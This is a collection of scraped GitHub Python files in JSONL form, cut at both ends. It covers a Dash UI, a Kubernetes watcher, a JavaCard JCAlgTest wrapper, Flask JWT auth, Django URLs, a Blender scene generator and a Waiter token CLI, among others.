settings['APP_BE_LOCAL_PORT'] = value['APP_BE_LOCAL_PORT']\r\n settings['MAIL'] = False\r\n if \"prod\" in key:\r\n settings['MAIL'] = True\r\n # print('APP_FE_URL: ', APP_FE_URL)\r\n return settings\r\n except:\r\n print(traceback.format_exc())\r\n print(\"Config file not found. Mode - test\")\r\n","repo_name":"ajesh12k/Angular8FE-PythonBE","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38553345275","text":"import dash_daq as daq\nfrom dash import Output, Input, html\nfrom dash.exceptions import PreventUpdate\nfrom dash_bootstrap_templates import ThemeSwitchAIO\n\nfrom consts import TagIds, Theme, TagFields, NavButtons, InputModes, Icons\nfrom dash_setup import app\nfrom mappings.handlers import EXTRA, TYPES\nfrom mappings.tabs import PAGES\nfrom realtime_data import realtime\nfrom tabs.control_panel import create_control_panel\n\n\n@app.callback(Output(TagIds.Layout.EXTRA, TagFields.CHILDREN), Input(TagIds.LOCATION, TagFields.PATH))\ndef render_extra_content_by_input_mode(url):\n return EXTRA.get(url.strip('/'), [])\n\n\n@app.callback(Output(TagIds.Layout.CONTENT, TagFields.CHILDREN), Input(TagIds.TABS, TagFields.VALUE))\ndef render_content_by_tab(tab):\n return PAGES[tab][TagIds.Layout.CONTENT].render()\n\n\n@app.callback(Output(TagIds.Layout.THEME, TagFields.CHILDREN),\n Input(ThemeSwitchAIO.ids.switch(TagIds.THEME), TagFields.VALUE))\ndef change_theme(theme):\n Theme.DAQ_THEME['dark'] = theme\n content = [create_control_panel(), html.Div(id=TagIds.Layout.CONTENT, className='flex column')]\n return daq.DarkThemeProvider(theme=Theme.DAQ_THEME, children=content)\n\n\n@app.callback(Output(TagIds.CLOCK, TagFields.CHILDREN),\n Input(TagIds.Intervals.SYNC_DATA, TagFields.INTERVAL), prevent_initial_call=True)\ndef update_timer(intervals):\n timestamp = 'Timer: '\n if realtime.database.is_not_empty():\n timestamp += realtime.database.time_gap()\n return Icons.Css.TIMER, timestamp\n\n\n@app.callback(\n [[Output(f\"{mode}_label\", TagFields.CHILDREN), Output(f\"{mode}_link\", TagFields.STYLE)] for mode in InputModes.ALL],\n Input(TagIds.LOCATION, TagFields.PATH), Input(TagIds.Intervals.SYNC_DATA, TagFields.INTERVAL),\n prevent_initial_call=True\n)\ndef display_connection_status(path, *args):\n path = path.strip('/')\n output = []\n if not realtime.in_types():\n raise PreventUpdate\n current = TYPES[realtime.thread.handler_name].current\n for input_mode in InputModes.ALL:\n option = check_status(input_mode, path)\n message = NavButtons.OPTIONS[option]['message'].format(current=current)\n output.append([message, {'background-color': NavButtons.OPTIONS[option]['color']}])\n return output\n\n\ndef check_status(input_mode, path):\n option = NavButtons.DEFAULT\n if input_mode == path:\n option = NavButtons.CLICKED\n if realtime.thread.events.Finish.connect.is_set():\n option = NavButtons.CONNECTED\n elif realtime.thread.events.disconnect.is_set():\n option = NavButtons.DISCONNECTED\n return option\n","repo_name":"noga-malka/Dash","sub_path":"callbacks/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3016505782","text":"from kubernetes import client, config, watch\r\nfrom KubernetesTest.Tools import EventHandle\r\n\r\nconfig.kube_config.load_kube_config(config_file=\"kubeconfig.yaml\")\r\n\r\n# 获取API的CoreV1Api版本对象\r\nv1 = client.CoreV1Api()\r\n\r\nw = watch.Watch()\r\nfor event in w.stream(v1.list_pod_for_all_namespaces):\r\n if event['object'].metadata.namespace == 'app01':\r\n EventHandle(event)\r\n","repo_name":"jichengxi/study","sub_path":"tools/KubernetesTest/PodInfo.py","file_name":"PodInfo.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28665521223","text":"from Fund import Fund\nfrom FundVisualizer import FundVisualizer, setup_mpl\nimport requests\nimport multiprocessing\nfrom datetime import date, timedelta\n\nclass FundUtil:\n def __init__(self, start_date, end_date):\n setup_mpl()\n self.viz = FundVisualizer()\n self.session = requests.Session()\n self.start_date = start_date\n self.end_date = end_date\n\nsession = requests.Session()\nstart_date = None\nend_date = None\n\ndef init_process():\n global session\n global start_date\n global end_date\n # fund_util = FundUtil(start_date=date.today()-timedelta(days=120), end_date=str(date.today()))\n start_date = start_date=date.today()-timedelta(days=120)\n end_date=str(date.today())\n\ndef get_fund(fund_id):\n global session\n global start_date\n global end_date\n fund = Fund(fund_id, start_date, end_date)\n fund.update_data(session=session)\n return fund\n\ndef fetch_data(fund_id_list):\n with multiprocessing.Pool(initializer=init_process) as pool:\n fund_sets = pool.map(get_fund,\n fund_id_list)\n return fund_sets\n\nif __name__ == '__main__':\n fund_id_list = [\n '519002',\n '161818',\n '001069'\n ]\n fetch_data(fund_id_list)\n ","repo_name":"AutoRecursive/qianjinqiu","sub_path":"Fund/FundSet.py","file_name":"FundSet.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17770066269","text":"import csv\r\n\r\ndef read_cell(x, y):\r\n with open('merged dataset.csv', 'r') as f:\r\n reader = csv.reader(f)\r\n y_count = 0\r\n for n in reader:\r\n if y_count == y:\r\n cell = n[x]\r\n return cell\r\n y_count += 1\r\n\r\nf = open('merged dataset.csv', 'r')\r\nfile = open('final merged dataset.csv', 'w')\r\n\r\nfor i in range(842):\r\n conflict = read_cell(1, i)\r\n if 'Interpersonal' in conflict and 'Religion' not in conflict:\r\n conflict = 'Interpersonal'\r\n elif 'Religion' in conflict and 'Interpersonal' not in conflict:\r\n conflict = 'Religion'\r\n else:\r\n conflict = 'Interpersonal and Religion'\r\n file.write(str(read_cell(0, i))+','+str(conflict)+','+str(read_cell(2, i))+','+str(read_cell(3, i))+',\"'+str(read_cell(4, i))+'\",'+str(read_cell(5, i))+','+str(read_cell(6, i))+'\\n')\r\n\r\nfile.close()","repo_name":"Saravanac5a/partition-analysis","sub_path":"conflicts.py","file_name":"conflicts.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42549081966","text":"import heapq\r\n\r\nclass Solution(object):\r\n def kthSmallest(self, matrix, k):\r\n\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n h = []\r\n i = 0\r\n\r\n for l in matrix:\r\n\r\n for element in l:\r\n\r\n heapq.heappush(h, (element, i))\r\n i += 1\r\n\r\n for i in range(k):\r\n val = heapq.heappop(h)\r\n\r\n return val[0]\r\n\r\nr = Solution()\r\n\r\nres = r.kthSmallest([\r\n [1,5,9],\r\n [10,11,13],\r\n [12,13,15]\r\n], 8)\r\n\r\nprint (res)\r\n\r\n\r\n\r\n","repo_name":"nmaswood/leetcode","sub_path":"finished/378-kthSmallestElementInASortedMatrix.py","file_name":"378-kthSmallestElementInASortedMatrix.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"42665357158","text":"import os\nimport pathlib\nfrom abc import ABC, abstractmethod\nfrom typing import List, final\n\nfrom overrides import overrides, EnforceOverrides\n\nfrom scrutiny.config import Paths\nfrom scrutiny.interfaces import ToolWrapper\nfrom scrutiny.javacard.modules.algperformance import AlgPerformance\nfrom scrutiny.javacard.modules.algvariable import AlgVariable\nfrom scrutiny.javacard.modules.jcalgtest import JCAlgTestModule, \\\n PerformanceResult, SupportResult\nfrom scrutiny.utils import execute_cmd\nfrom scrutiny.javacard.modules.algsupport import AlgSupport\n\nSUPPORT_STRING = \"ALGSUPPORT\"\nPERFORMANCE_STRING = \"DATAFIXED\"\nVARIABLE_STRING = \"DATADEPEND\"\n\nDISCARD = [\n \"This file was generated by AlgTest utility\",\n \"This is very specific feature\",\n \"algorithm_name\"\n]\n\nTEST_INFO = [\n \"Tested and provided by\",\n \"Execution date\",\n \"AlgTest\",\n \"Used reader\",\n \"Card ATR\",\n \"Card name\",\n \"Card provider\",\n \"Used protocol\",\n \"High-power mode supported\",\n \"Package_AID_test\",\n \"JavaCard support version\",\n \"Total\"\n]\n\n\ndef install_jcalgtest_applet(force=False):\n \"\"\"\n Installs JCAlgTest applet\n :param force: also remove previously installed JCAlgTest applets\n \"\"\"\n if force:\n execute_cmd(\"java -jar \" + Paths.GPPRO + \" -uninstall \" +\n Paths.JCALGTEST_305)\n for applet in Paths.JCALGTEST_CAPS:\n cmd_line = \"java -jar \" + Paths.GPPRO + \" -install \" + applet\n if execute_cmd(cmd_line) == 0:\n break\n\n\ndef parse_common_line(module: JCAlgTestModule, line: str) -> bool:\n \"\"\"\n Parses common lines found in all JCAlgTest output types\n :param line: parsed line\n :param module: JCAlgTest module\n :return True if line contained common data\n \"\"\"\n\n if line == \"\" or \";\" not in line \\\n or any([d in line for d in DISCARD]):\n return True\n\n data = line.split(\";\")\n\n if any([line.startswith(info) for info in TEST_INFO]):\n module.test_info[data[0]] = data[1].strip()\n return True\n\n if line.startswith(\"JCSystem\"):\n module.jcsystem[data[0]] = data[1]\n return True\n\n if line.startswith(\"APDU\"):\n module.apdu[data[0]] = data[1]\n return True\n\n if line.startswith(\"CPLC\"):\n module.cplc[data[0]] = data[1]\n return True\n\n return False\n\n\ndef parse_performance_block(lines: List[str], position: int,\n result: PerformanceResult):\n \"\"\"\n Parse performance block in JCAlgTest performance data\n\n Example of the parsed data:\n method name:; TYPE_DES LENGTH_DES ALG_DES_CBC_NOPAD Cipher_update()\n measurement config:;appletPrepareINS;31;appletMeasureINS;43;config;00...\n baseline measurements (ms):;154,00;151,00;152,00;152,00;151,00;\n baseline stats (ms):;avg:;152,00;min:;151,00;max:;154,00;\n operation raw measurements (ms):;986,00;989,00;989,00;988,00;988,00;\n operation stats (ms/op):;avg op:;19,76;min op:;19,72;max op:;19,78;\n operation info:;data length;256;total iterations;250;total invocations;250;\n \"\"\"\n\n conf, base, base_stats, op, op_stats, op_info = \\\n ([col.strip() for col in lines[position + i].split(\";\")]\n for i in range(1, 7))\n\n if conf[0] != \"measurement config:\":\n result.error = \";\".join(conf)\n return\n\n result.prepare_ins = int(conf[2], 16)\n result.measure_ins = int(conf[4], 16)\n result.config = conf[6]\n\n if base[0] != \"baseline measurements (ms):\":\n result.error = \";\".join(base)\n return\n\n result.baseline.extend([float(v.replace(\",\", \".\")) for v in base[1:-1]])\n\n if base_stats[0] != \"baseline stats (ms):\":\n result.error = \";\".join(base_stats)\n return\n\n # Implement control?\n\n if op[0] != \"operation raw measurements (ms):\":\n result.error = \";\".join(op)\n return\n\n result.operation.extend([float(v.replace(\",\", \".\")) for v in op[1:-1]])\n\n if op_stats[0] != \"operation stats (ms/op):\":\n result.error = \";\".join(op_stats)\n return\n\n # Implement control?\n\n if op_info[0] != \"operation info:\":\n result.error = \";\".join(op_stats)\n return\n\n result.data_length = int(op_info[2])\n result.iterations = int(op_info[4])\n result.invocations = int(op_info[6])\n\n\nclass JCAlgTest(ToolWrapper, ABC, EnforceOverrides):\n \"\"\"SCRUTINY JCAlgTest ToolWrapper\"\"\"\n\n JCALGTEST_BIN = \"java -jar \" + Paths.JCALGTEST\n CAPS = Paths.JCALGTEST_CAPS\n\n def __init__(self, card_name, force_mode=False, install=True):\n super().__init__(card_name, force_mode)\n self.outfile = None\n if install:\n install_jcalgtest_applet()\n\n @final\n def find_outfile(self, search_string):\n \"\"\"\n Find JCAlgTest output file\n :param search_string: JCAlgTest mode string\n \"\"\"\n if self.outfile:\n return self.outfile\n for file in os.listdir(self.get_outpath(\"\")):\n if search_string in file:\n self.outfile = file\n return self.outfile\n\n @abstractmethod\n def get_outfile(self):\n \"\"\"\n Get JCAlgTest output file name\n :return: Output file name if it exists\n \"\"\"\n\n @final\n def run_jcalgtest(self, args, search_string):\n \"\"\"\n Run JCAlgTest\n :param args: JCAlgTest arguments\n :param search_string: JCAlgTest mode string\n :return: return code\n \"\"\"\n cmd_line = self.JCALGTEST_BIN + \" \" + \" \".join(args)\n if self.get_outfile():\n print(\"Skipping \" + cmd_line + \" (results found).\")\n return 0\n\n retcode = execute_cmd(cmd_line)\n\n # if existing measurement is already present in results folder, replace it with newer one\n for file in os.listdir(\"./results/\" + self.device_name + \"/\"):\n if search_string in file and self.device_name in file:\n dest = self.get_outpath(file)\n #os.replace(file, dest)\n self.outfile = file\n break\n\n return retcode\n\n @classmethod\n def parse_specific_lines(cls, line: str, module: JCAlgTestModule,\n lines: List[str], position: int) -> None:\n \"\"\"\n Parses lines from different types of JCAlgTest results\n :param line starting line\n :param module: JCAlgTest module\n :param lines: file content\n :param position: line to parse\n :return:\n \"\"\"\n\n @classmethod\n @final\n def parse_loop(cls, module, filename) -> None:\n \"\"\"Performs general parsing loop for JCAlgTest result files\"\"\"\n\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n\n line = line.strip()\n\n if parse_common_line(module, line):\n continue\n\n cls.parse_specific_lines(line, module, lines, i)\n\n\nclass JCAlgTestSupport(JCAlgTest):\n \"\"\"JCAlgTest support ToolWrapper\"\"\"\n @overrides\n def get_outfile(self):\n return self.find_outfile(SUPPORT_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest(['-fresh', '-op', 'ALG_SUPPORT_BASIC', '-cardname', self.device_name,\n '-outpath', './results/' + self.device_name + '/'], SUPPORT_STRING)\n\n @overrides\n def parse(self):\n alg_support = AlgSupport()\n modules = [alg_support]\n self.parse_loop(alg_support, self.get_outpath(self.outfile))\n return modules\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: AlgSupport,\n lines: List[str], position: int) -> None:\n\n result = SupportResult()\n data = [col.strip() for col in line.split(\";\")]\n\n if data[1] == \"yes\":\n result.support = True\n elif data[1] == \"no\":\n result.support = False\n else:\n result.error = data[1]\n result.support = False\n\n if len(data) >= 3 and data[2] != \"\":\n if \"sec\" in data[2]:\n data[2] = data[2].split(\" \")[0]\n result.time_elapsed = float(data[2].replace(\",\", \".\"))\n if len(data) >= 6:\n result.persistent_memory = int(data[3])\n result.ram_deselect = int(data[4])\n result.ram_reset = int(data[5])\n\n if data[0] not in module.support:\n module.support[data[0]] = result\n\n\nclass JCAlgTestSupportExtended(JCAlgTest):\n \"\"\"JCAlgTest extended support ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(SUPPORT_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest(['-fresh', '-op', 'ALG_SUPPORT_EXTENDED', '-cardname', self.device_name,\n '-outpath', './results/' + self.device_name + '/'], SUPPORT_STRING)\n\n @overrides\n def parse(self):\n return JCAlgTestSupport.parse(self)\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: AlgSupport,\n lines: List[str], position: int) -> None:\n return JCAlgTestSupport.parse_specific_lines(line, module, lines, position)\n\n\nclass JCAlgTestPerformance(JCAlgTest):\n \"\"\"JCAlgTest performance ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(PERFORMANCE_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest([], PERFORMANCE_STRING)\n\n @overrides\n def parse(self):\n alg_performance = AlgPerformance()\n modules = [alg_performance]\n self.parse_loop(alg_performance, self.get_outpath(self.outfile))\n return modules\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: JCAlgTestModule,\n lines: List[str], position: int) -> None:\n\n if not line.startswith(\"method name:\"):\n return\n\n result = PerformanceResult()\n key = line.split(\";\")[1].strip()\n module.add_result(key, result)\n\n parse_performance_block(lines, position, result)\n\n\nclass JCAlgTestVariable(JCAlgTestPerformance):\n \"\"\"JCAlgTest variable performance ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(VARIABLE_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest([], VARIABLE_STRING)\n\n @overrides\n def parse(self):\n alg_variable = AlgVariable()\n modules = [alg_variable]\n self.parse_loop(alg_variable, self.get_outpath(self.outfile))\n return modules\n","repo_name":"crocs-muni/scrutiny","sub_path":"scrutiny/javacard/toolwrappers/jcalgtest.py","file_name":"jcalgtest.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"4098084777","text":"# Python code to illustrate \n# reduce() with lambda() \n# to get sum of a list \nfrom functools import reduce\nli = [5, 8, 10, 20, 50, 100] \nsum = reduce((lambda x, y: x + y), li) \nprint (sum) \n# 193\n# @###################################3\n# Python program to Find the Number \n# Occurring Odd Number of Times \n# using Lambda expression and reduce function \n\nfrom functools import reduce\n\ndef oddTimes(input): \n\t# write lambda expression and apply \n\t# reduce function over input list \n\t# until single value is left \n\t# expression reduces value of a ^ b into single value \n\t# a starts from 0 and b from 1 \n\t# ((((((1 ^ 2)^3)^2)^3)^1)^3) \n\tprint (reduce(lambda a, b: a ^ b, input)) \n\n# Driver program \nif __name__ == \"__main__\": \n\tinput = [1, 2, 3, 2, 3, 1, 3] \n\toddTimes(input) \n\n# ========>>>out : 3\n","repo_name":"pydevcasts/python-sy","sub_path":"function/redu_map_filter/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28928178267","text":"import os\nimport json\nimport random\nimport subprocess\nimport uuid\n\nfrom argparse import ArgumentParser\nfrom codenamize import codenamize\nfrom dataset_toolbox.src.tools.common import find_filepaths, get_list, mkdirp\nfrom simulants.description import SimulantDescriptionGenerator, update_layers\n\n\ndef make_a_simulant(sim_info, out_dir):\n sim_id = codenamize(str(uuid.uuid4()), 2, 0)\n simulant = SimulantDescriptionGenerator(0, sim_id, sim_info)\n info = simulant.desriptor()\n\n with open(os.path.join(out_dir, '{}.json'.format(sim_id)), 'w') as outfile:\n json.dump(info, outfile, indent=2)\n\n return sim_id\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--out_dir', type=str, help='where simulant jsons will go',\n default='tmp/jsons')\n parser.add_argument('--sim_dir', type=str, help='where simulant blends files should go',\n default='tmp/simulants')\n parser.add_argument('--textures', type=str, help='directory of texture pngs',\n default='data/patterns')\n parser.add_argument('--pose_list', type=str, help='list of poses to use',\n default='data/mocap_pose_list.txt')\n parser.add_argument('--hairs', type=str, help='base directory of hair models',\n default='data/hairs')\n parser.add_argument('--clothes', type=str, help='base directory of clothing models',\n default='data/clothes')\n parser.add_argument('--scene_json', type=str, help='where the scene json will go', required=True)\n parser.add_argument('--scene_dir', type=str, help='if saved, where scene blend files should end up', required=True)\n parser.add_argument('--backgrounds', type=str, help='directory of backround hdr images',\n default='data/backgrounds')\n parser.add_argument('--distribution', type=str, help='distribution function for sim positioning',\n default='uniform')\n parser.add_argument('--layer_dir', type=str, help='directory for rendered layers', required=True)\n args = parser.parse_args()\n\n mkdirp(args.out_dir)\n mkdirp(args.sim_dir)\n\n # Generate Simulant Descriptor\n textures = find_filepaths(args.textures, 'png')\n poses = get_list(args.pose_list)\n\n sim_info = {'out_path': args.sim_dir,\n 'hair_path': args.hairs,\n 'clothes_path': args.clothes,\n 'textures': textures,\n 'poses': poses}\n\n sim_id = make_a_simulant(sim_info, args.out_dir)\n\n # Generate Scene Descriptor\n backgrounds = find_filepaths(args.backgrounds, 'hdr')\n\n # Random scene values\n scene_id = str(uuid.uuid4())\n background = random.choice(backgrounds)\n background_rotation = random.uniform(0, 360)\n\n scene_info = {'scene_id': scene_id,\n 'scene_path': os.path.join(args.scene_dir, '{}.blend'.format(scene_id)),\n 'background': background,\n 'background_rotation': background_rotation,\n 'hdri_intensity': 1,\n 'image_size': [720, 1280],\n 'percent_size': 100,\n 'tile_size': 32,\n 'distribution': args.distribution}\n\n with open(os.path.join(args.out_dir, '{}.json'.format(sim_id))) as jd:\n simulant = json.load(jd)\n objects = [update_layers(simulant, 0)]\n scene_info['objects'] = objects\n\n mkdirp(args.scene_dir)\n scene_json = os.path.join(args.out_dir, '{}.json'.format(scene_id))\n with open(scene_json, 'w') as outfile:\n json.dump(scene_info, outfile, indent=2)\n\n # Make a Scene\n scene_cmd = ['blender', '-b', '-P',\n 'bin/blender/make_a_scene.py', '--',\n '--info', scene_json,\n '--base_scene', 'data/base_scene.blend']\n \n subprocess.check_call(scene_cmd)\n\n # Render Scene\n command = ['blender', '-b', '-P',\n 'bin/blender/build_and_render_scene.py', '--',\n '--info', scene_json,\n '--out', args.layer_dir,\n '--base', 'data/base_scene.blend']\n\n subprocess.check_call(command)\n","repo_name":"atomicguy/simulants","sub_path":"bin/simulant_generator.py","file_name":"simulant_generator.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18450980590","text":"#coding: utf-8\n\nfrom django.urls import path, re_path\nfrom maps.views import MapList, MapListPrice,MapDetail,PageDetail,AccList,GravList,ArchList #,list_by_tag\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\npath ('',MapList.as_view()),\npath ('engraving/', GravList.as_view()),\npath ('accessory/', AccList.as_view()),\npath ('archive/', ArchList.as_view()),\npath ('price', MapListPrice.as_view()),\npath ('items//',MapDetail.as_view()),\npath ('page//',PageDetail.as_view()),\npath ('tags//', MapList.as_view()),#list_by_tag),\n#path ('search/?q=', MapList.as_view()),#list_by_tag),\n#path(r'',views.MapListView.as_view()), # список карт\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"abitty/maps4u","sub_path":"maps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74747970114","text":"results = {}\n\ndef memo(num, result):\n if results[num] is not None:\n return results[num]\n else:\n results[num] = result\n\ndef fib(n):\n fib_result = None\n assert n >= 0\n # ending conditions\n if n < 2:\n return n\n else:\n # recursive call\n return fib(n - 1) + fib(n - 2)\n \nif __name__ == '__main__':\n try:\n # fibs = [fib(i) for i in range(10)]\n # print(fibs)\n print(fib(25))\n except AssertionError:\n print('Invalid input to fib()')","repo_name":"zynth-punk/bhcc","sub_path":"2021_03Fall_CSC225_Advanced_Python/bko_class_exercises/fibona.py","file_name":"fibona.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29993778664","text":"class Karma:\n def __init__(self, db):\n self.db = db\n\n def set_karma(self, user, value):\n if self.db.exists(f\"user:{user}\") == 0:\n self.db.hset(f\"user:{user}\", \"karma\", value)\n else:\n karma = int(self.db.hget(f\"user:{user}\", \"karma\"))\n karma = int(karma) + value\n self.db.hset(f\"user:{user}\", \"karma\", str(karma))\n\n\n def handle_karma(self, string, chat, bot):\n if \"++\" in string:\n user = string.split(\"++\")[0]\n self.set_karma(user, 1)\n elif \"—\" in string:\n user = string.split(\"—\")[0]\n self.set_karma(user, -1)\n else:\n user = string.split(\" \")[1]\n self.set_karma(user, 0)\n karma = self.db.hget(f\"user:{user}\", \"karma\")\n bot.send_message(chat_id=chat.id, text=user+\" has \"+karma+\" karma\")","repo_name":"insomniac807/flask_bot","sub_path":"karma.py","file_name":"karma.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13180877789","text":"import binascii\nimport hashlib\nimport time\nimport jwt\nimport os\n\nfrom functools import wraps\nfrom flask import abort\nfrom flask import request, jsonify\nfrom api.repository.user_repository import UserRepository\n\nsecret = os.environ.get('SECRET') or \"secretAPI-RESTnodejs1234$\"\n\n\nclass Auth:\n\n @staticmethod\n def login(request):\n username = request.json['username']\n password = request.json['password']\n user = UserRepository.get_user_by_name(username)\n if user is None:\n return {\"Result\": False, \"Error\": \"El usuario no existe\"}, 401\n salt = hashlib.sha256(secret.encode('ascii')).hexdigest().encode('ascii')\n hash = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'),\n salt, 100000)\n hash = binascii.hexlify(hash).hex()\n if user.hash == hash:\n token = jwt.encode({\"username\": user.username, 'exp': int(time.time()) + 3600 * 24},\n secret, algorithm='HS256')\n return token\n else:\n return {\"Result\": False, \"Error\": \"Contraseña incorrecta\"}, 401\n\n\ndef token_required(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n token = None\n if 'Authorization' in request.headers:\n token = request.headers['Authorization']\n if not token:\n return jsonify({\"meassage\": \"Token is missing\"}), 401\n try:\n jwt.decode(token, \"secretAPI-RESTnodejs1234$\", algorithm='HS256')\n except jwt.ExpiredSignatureError or jwt.InvalidTokenError:\n return jsonify({\"message\": \"Token is invalid\"}), 401\n return f(*args, **kwargs)\n\n return decorated\n","repo_name":"antonioalfa22/Python-API-Rest-Template","sub_path":"api/middlewares/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23582276701","text":"from __future__ import print_function\r\n\r\n\r\nclass Case:\r\n def __init__(self, d, n, enemies, case_num):\r\n self.case_num = case_num\r\n self.d = d\r\n self.n = n\r\n self.enemies = enemies\r\n self._debug = True\r\n\r\n\r\n def calculate(self):\r\n biggest_time = self._time(self.enemies[0])\r\n for enemy in self.enemies:\r\n time = self._time(enemy)\r\n if time > biggest_time:\r\n biggest_time = time\r\n\r\n result_str = 'Case #' + str(self.case_num) + ': ' + str(float(self.d)/biggest_time)+ '\\n'\r\n if self._debug:\r\n print(result_str)\r\n return result_str\r\n\r\n\r\n def _time(self, enemy):\r\n return (float(self.d - enemy[0]))/enemy[1]\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/995.py","file_name":"995.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12072049027","text":"import argparse\nimport logging\nfrom collections import defaultdict\nfrom enum import Enum\n\nimport requests\n\nfrom waiter import terminal, http_util\nfrom waiter.data_format import determine_format, display_data, load_data\nfrom waiter.querying import get_token, query_token, get_target_cluster_from_token\nfrom waiter.util import deep_merge, FALSE_STRINGS, is_admin_enabled, print_info, response_message, TRUE_STRINGS, \\\n guard_no_cluster, str2bool, update_in\n\nBOOL_STRINGS = TRUE_STRINGS + FALSE_STRINGS\nINT_PARAM_SUFFIXES = ['-failures', '-index', '-instances', '-length', '-level', '-mins', '-ms', '-secs']\nFLOAT_PARAM_SUFFIXES = ['-factor', '-rate', '-threshold']\nSTRING_PARAM_PREFIXES = ['env', 'metadata']\n\n\nclass Action(Enum):\n CREATE = 'create'\n UPDATE = 'update'\n INIT = 'init'\n\n def __str__(self):\n return f'{self.value}'\n\n def should_patch(self):\n return self is Action.UPDATE\n\n\ndef process_post_result(resp):\n \"\"\"Prints the result of a token POST\"\"\"\n resp_json = resp.json()\n if 'message' in resp_json:\n message = resp_json['message']\n print_info(f'{message}.')\n return\n\n raise Exception(f'{response_message(resp_json)}')\n\n\ndef post_failed_message(cluster_name, reason):\n \"\"\"Generates a failed token post message with the given cluster name and reason\"\"\"\n return f'Token post {terminal.failed(\"failed\")} on {cluster_name}:\\n{terminal.reason(reason)}'\n\n\ndef get_overrides(token_fields_base, token_fields_from_args):\n \"\"\"Returns true if there are any overrides from the token key args. Handles nested fields args split by a period.\"\"\"\n overrides = []\n for key_raw, _ in token_fields_from_args.items():\n keys = key_raw.split('.')\n base_ref = token_fields_base\n try:\n for key in keys:\n base_ref = base_ref[key]\n # no KeyError means that the token_fields_base has an existing value corresponding with the arg\n overrides.append(key_raw)\n except KeyError:\n pass\n return overrides\n\n\ndef merge_token_fields_from_args(token_fields_base, token_fields_from_args):\n \"\"\"Merges token fields from json and token fields from args. Handles nested fields args split by a period.\"\"\"\n token_fields = {**token_fields_base}\n for key_raw, value in token_fields_from_args.items():\n keys = key_raw.split('.')\n update_in(token_fields, keys, value)\n return token_fields\n\n\ndef create_or_update(cluster, token_name, token_fields, admin_mode, action, fields_from_args_only, output):\n \"\"\"Creates (or updates) the given token on the given cluster\"\"\"\n cluster_name = cluster['name']\n cluster_url = cluster['url']\n\n existing_token_data, existing_token_etag = get_token(cluster, token_name)\n try:\n print_info(f'Attempting to {action} token {(\"in ADMIN mode \" if admin_mode else \"\")}'\n f'{(\"with dry-run enabled \" if output else \"\")}on {terminal.bold(cluster_name)}...')\n params = {'token': token_name}\n if admin_mode:\n params['update-mode'] = 'admin'\n json_body = existing_token_data if existing_token_data and action.should_patch() else {}\n if fields_from_args_only and action.should_patch():\n json_body = deep_merge(json_body, token_fields)\n else:\n json_body.update(token_fields)\n if output is None:\n headers = {'If-Match': existing_token_etag or ''}\n resp = http_util.post(cluster, 'token', json_body, params=params, headers=headers)\n process_post_result(resp)\n elif output == '-':\n print_info('Token configuration (as json) is:')\n display_data({'json': True}, json_body)\n else:\n output_format = 'json' if output.endswith('.json') else 'yaml'\n output_options = {output_format: True}\n data_format = determine_format(output_options)\n print_info(f'Writing token configuration (as {output_format}) to {output}')\n with open(output, 'w') as out_file:\n data_format.dump(json_body, out_file)\n return 0\n except requests.exceptions.ReadTimeout as rt:\n logging.exception(rt)\n 